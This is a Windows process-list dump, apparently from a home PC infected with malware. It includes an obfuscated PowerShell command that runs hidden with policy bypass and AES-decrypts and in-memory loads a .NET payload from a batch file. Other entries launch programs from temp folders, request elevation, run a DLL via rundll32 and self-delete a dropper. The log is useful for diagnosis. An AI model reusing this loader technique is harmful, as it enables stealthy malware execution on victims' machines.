ID: 912, Name: csrss.

exe, CommandLine:
===============
ID: 1172, Name: [Link], CommandLine:
===============
ID: 1228, Name: [Link], CommandLine:
===============
ID: 1300, Name: [Link], CommandLine:
===============
ID: 2644, Name: [Link], CommandLine:
===============
ID: 7072, Name: [Link], CommandLine: [Link]
===============
ID: 6544, Name: [Link], CommandLine: C:\Windows\system32\[Link] -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6924, Name: [Link], CommandLine: C:\Windows\system32\[Link] -k
UnistackSvcGroup -s WpnUserService
===============
ID: 6868, Name: [Link], CommandLine: C:\Windows\system32\
[Link] -asus2357start -hide
===============
ID: 3664, Name: [Link], CommandLine: [Link] {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 7432, Name: [Link], CommandLine:
===============
ID: 7688, Name: [Link], CommandLine: C:\Windows\[Link]
===============
ID: 7952, Name: [Link], CommandLine: C:\Windows\system32\[Link] -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8208, Name: [Link], CommandLine: "C:\Windows\SystemApps\
[Link].StartMenuExperienceHost_cw5n1h2txyewy\
[Link]" -
ServerName:[Link]
===============
ID: 8432, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 8636, Name: [Link], CommandLine: "C:\Windows\SystemApps\
[Link].Search_cw5n1h2txyewy\[Link]" -
ServerName:[Link]
===============
ID: 8764, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 9992, Name: [Link], CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.23112.87.0_x64__8wekyb3d8bbwe\
[Link]" -ComServer:Background -Embedding
===============
ID: 9468, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 10340, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 10888, Name: [Link], CommandLine: "C:\Windows\SystemApps\
[Link].CBS_cw5n1h2txyewy\[Link]" -
ServerName:[Link]
===============
ID: 11332, Name: [Link], CommandLine: "C:\Windows\System32\
[Link]"
===============
ID: 11484, Name: [Link], CommandLine: "C:\Program Files\TightVNC\
[Link]" -controlservice -slave
===============
ID: 11544, Name: [Link], CommandLine: [Link] /nogui
===============
ID: 11568, Name: [Link], CommandLine: "C:\Program Files\Riot Vanguard\
[Link]"
===============
ID: 11616, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\[Link]" /background
===============
ID: 12032, Name: [Link], CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\[Link]"
===============
ID: 12048, Name: [Link], CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\libs\[Link]" "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\js\[Link]"
===============
ID: 12056, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 12132, Name: [Link], CommandLine: "C:\Riot Games\Riot Client\
[Link]" --launch-background-mode
===============
ID: 12236, Name: [Link], CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\[Link]" "-launchedbyvulcan-
12048 C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\[Link]"
===============
ID: 1576, Name: [Link], CommandLine: "C:\Riot Games\Riot
Client\[Link]" --no-rate-limit "--attachment=2024-01-28T23-18-
08_12132_Riot_Client.[Link]=C:/Users/User/AppData/Local/Riot Games/Riot
Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot [Link]" "--
attachment=2024-01-28T23-18-08_12132_Riot_Client.log=C:/Users/User/AppData/Local/
Riot Games/Riot Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot
[Link]" "--attachment=__sentry-breadcrumb1=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client\[Link]\
__sentry-breadcrumb1" "--attachment=__sentry-breadcrumb2=C:\Users\User\AppData\
Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
[Link]\__sentry-breadcrumb2" "--attachment=__sentry-event=C:\Users\User\
AppData\Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
[Link]\__sentry-event" "--database=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client" "--metrics-dir=C:\Users\User\AppData\Local\
Riot Games\Riot Client\Crashes\Riot Client"
--url=[Link]
sentry_key=dc54709324504ab18ddf517a83f99e1a --initial-client-
data=0x378,0x3f8,0x3c8,0x384,0x3e0,0x6f64ed88,0x6f64ed98,0x6f64eda8
===============
ID: 12968, Name: [Link], CommandLine: "C:\Program Files\TrustEdgeID\
[Link]"
===============
ID: 13048, Name: [Link], CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\[Link]"
===============
ID: 13108, Name: [Link], CommandLine: "C:\Program Files\
Native Instruments\Komplete Audio Driver\W10_x64\[Link]"
-hide
===============
ID: 13220, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\
CNext\[Link]" atlogon
===============
ID: 4892, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\CNext\
[Link]" watch 13220
===============
ID: 12700, Name: [Link], CommandLine:
===============
ID: 7664, Name: [Link], CommandLine:
===============
ID: 1188, Name: [Link], CommandLine: "C:\Program Files\Microsoft Office\
Office15\[Link]"
===============
ID: 2860, Name: [Link], CommandLine: C:\Windows\system32\
[Link] -Embedding
===============
ID: 11460, Name: [Link], CommandLine: "C:\Program Files\
WindowsApps\Microsoft.ZuneMusic_11.2312.7.0_x64__8wekyb3d8bbwe\
[Link]" -
ServerName:[Link]
===============
ID: 8372, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 9348, Name: [Link], CommandLine: C:\Windows\System32\[Link] -k
UnistackSvcGroup
===============
ID: 12828, Name: [Link], CommandLine: C:\Windows\system32\[Link]
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 10116, Name: [Link], CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\[Link]" -auto
===============
ID: 13648, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\
CNext\[Link]" --type=utility --enable-
features=AllowContentInitiatedDataUrlNavigations,TracingServiceInProcess --disable-
features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,FormControlsRef
resh,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebU
SB --lang=sr --service-sandbox-type=network --use-gl=angle --application-
name=Radeonsoftware --webengine-schemes=qrc:sLV --mojo-platform-channel-handle=5208
/prefetch:8
===============
ID: 4216, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\CNext\
[Link]" fb28e830-7c29-4591-b2df-4e16275fa0d9 SOFTWARE\AMD\DVR\Overlays
===============
ID: 8616, Name: [Link], CommandLine: C:\Windows\System32\[Link] -
Embedding
===============
ID: 9880, Name: [Link], CommandLine: "E:\Instalacije\Totalcmd\[Link]"
===============
ID: 5152, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=gpu-process --field-trial-
handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --no-sandbox --disable-gpu-driver-bug-
workarounds --log-file="C:\Users\User\AppData\Roaming\Avast Software\Avast\log\
cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0 AppleWebKit/537.36
(KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium (0.0.0) (Windows
10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --force-wave-audio
--disable-software-rasterizer --no-sandbox --blacklist-accelerated-compositing --
disable-accelerated-2d-canvas --disable-accelerated-compositing --disable-
accelerated-layers --disable-accelerated-video-decode --blacklist-webgl --disable-
bundled-ppapi-flash --disable-flash-3d --enable-aggressive-domstorage-flushing --
enable-media-stream --disable-gpu --disable-webgl --disable-gpu-compositing --
allow-file-access-from-files=1 --pack_loading_disabled=1 --gpu-
preferences=SAAAAAAAAADgAABwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --log-file="C:\Users\User\AppData\
Roaming\Avast Software\Avast\log\cef_log.txt" --mojo-platform-channel-
handle=8416 /prefetch:2
===============
ID: 4712, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=utility --utility-sub-type=[Link] --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=utility --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8608 /prefetch:8
===============
ID: 12392, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=utility --utility-sub-type=[Link] --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=none --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8660 /prefetch:8
===============
ID: 9868, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=utility --utility-sub-type=[Link] --field-
trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=audio --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=10108 /prefetch:8
===============
ID: 12584, Name: [Link], CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\[Link]" -
ServerName:[Link]
===============
ID: 5060, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 13356, Name: [Link], CommandLine: C:\Windows\System32\oobe\
[Link] -Embedding
===============
ID: 7412, Name: [Link], CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\[Link]"
===============
ID: 3508, Name: [Link], CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\[Link]" --type=collab-renderer --proc=7412
===============
ID: 9876, Name: [Link], CommandLine:
===============
ID: 13096, Name: [Link], CommandLine: C:\Users\User\AppData\Local\Temp\[Link]
===============
ID: 4120, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\f4728982-
a5a0-4742-973b-67968a402246\[Link]"
===============
ID: 11312, Name: [Link], CommandLine: C:\Users\User\AppData\Local\Temp\[Link]
===============
ID: 10264, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\[Link]"
===============
ID: 13132, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 9576, Name: [Link], CommandLine: "C:\Users\User\AppData\
Local\Temp\jobA4aodo3bpwLTVri\[Link]"
===============
ID: 12004, Name: [Link], CommandLine: C:\Windows\System32\[Link] -
Embedding
===============
ID: 14608, Name: [Link], CommandLine:
===============
ID: 14760, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 14780, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 11964, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
1000718001\[Link]"
===============
ID: 3620, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
1000721001\[Link]"
===============
ID: 14900, Name: [Link], CommandLine: C:\Windows\system32\[Link] /c C:\Users\
User\AppData\Local\Temp\[Link]
===============
ID: 14928, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 10204, Name: [Link], CommandLine: C:\Windows\system32\[Link]
===============
ID: 11480, Name: [Link], CommandLine: [Link]
===============
ID: 9708, Name: [Link], CommandLine: "[Link]" -noprofile -
windowstyle hidden -ep bypass -command $_CASH_qaVPf = [[Link]]::
('txeTllAdaeR'[-1..-11] -join '')('C:\Users\User\AppData\Local\Temp\
[Link]').Split([Environment]::NewLine);foreach ($_CASH_fIZHT in $_CASH_qaVPf)
{ if ($_CASH_fIZHT.StartsWith(':: @')) { $_CASH_XqEBS = $_CASH_fIZHT.Substring(4);
break; }; };$_CASH_XqEBS =
[[Link]]::Replace($_CASH_XqEBS, '_CASH_', '');
$_CASH_AbGjb = [[Link]]::('gnirtS46esaBmorF'[-1..-16] -join '')
($_CASH_XqEBS);$_CASH_xbtcQ = New-Object [Link];
$_CASH_xbtcQ.Mode = [[Link]]::CBC;
$_CASH_xbtcQ.Padding =
[[Link]]::PKCS7;$_CASH_xbtcQ.Key =
[[Link]]::('gnirtS46esaBmorF'[-1..-16] -join '')
('xnU+qixX8GxmNdtUiuJWKTS5382DUH1RFgNRqJG+Kzg=');$_CASH_xbtcQ.IV =
[[Link]]::('gnirtS46esaBmorF'[-1..-16] -join '')
('q4+6cHkazpcj3F4mKI+rYw==');$_CASH_KXHue = $_CASH_xbtcQ.CreateDecryptor();
$_CASH_AbGjb = $_CASH_KXHue.TransformFinalBlock($_CASH_AbGjb, 0,
$_CASH_AbGjb.Length);$_CASH_KXHue.Dispose();$_CASH_xbtcQ.Dispose();$_CASH_kEHGI =
New-Object [Link](, $_CASH_AbGjb);$_CASH_Kscdn = New-Object
[Link];$_CASH_Lfmtj = New-Object
[Link]($_CASH_kEHGI,
[[Link]]::Decompress);$_CASH_Lfmtj.CopyTo($_CASH_Kscdn);
$_CASH_Lfmtj.Dispose();$_CASH_kEHGI.Dispose();$_CASH_Kscdn.Dispose();$_CASH_AbGjb =
$_CASH_Kscdn.ToArray();$_CASH_kHyYf = [[Link]]::('daoL'[-1..-4]
-join '')($_CASH_AbGjb);$_CASH_ZMxsS = $_CASH_kHyYf.EntryPoint;
$_CASH_ZMxsS.Invoke($null, (, [string[]] ('')))
===============
ID: 3688, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
[Link]"
===============
ID: 10724, Name: [Link], CommandLine: C:\Windows\system32\
WindowsPowerShell\v1.0\[Link] Start-Process "C:\Users\User\AppData\Local\
Temp\[Link]" -Verb runAs
===============
ID: 1376, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 9024, Name: [Link], CommandLine:
===============
ID: 13452, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 13336, Name: [Link], CommandLine: [Link]
===============
ID: 13392, Name: [Link], CommandLine:
===============
ID: 12588, Name: [Link], CommandLine:
===============
ID: 2208, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 12296, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
1000726001\[Link]"
===============
ID: 12448, Name: [Link], CommandLine: "C:\Users\User\AppData\Roaming\
configurationValue\[Link]"
===============
ID: 9584, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 7984, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 3364, Name: [Link], CommandLine:
===============
ID: 4148, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 10660, Name: [Link], CommandLine:
===============
ID: 4636, Name: [Link], CommandLine:
===============
ID: 10740, Name: [Link], CommandLine: C:\Windows\system32\[Link] /c choice /C
Y /N /D Y /T 3 & Del "C:\Users\User\AppData\Local\Temp\1000731001\[Link]"
===============
ID: 11744, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 11840, Name: [Link], CommandLine: "C:\Windows\System32\[Link]" C:\
Users\User\AppData\Roaming\006700e5a2ab05\[Link], Main
===============
ID: 2000, Name: [Link], CommandLine: choice /C Y /N /D Y /T 3
===============
ID: 8036, Name: [Link], CommandLine:
===============
ID: 3644, Name: [Link], CommandLine:
===============
ID: 8668, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\[Link]"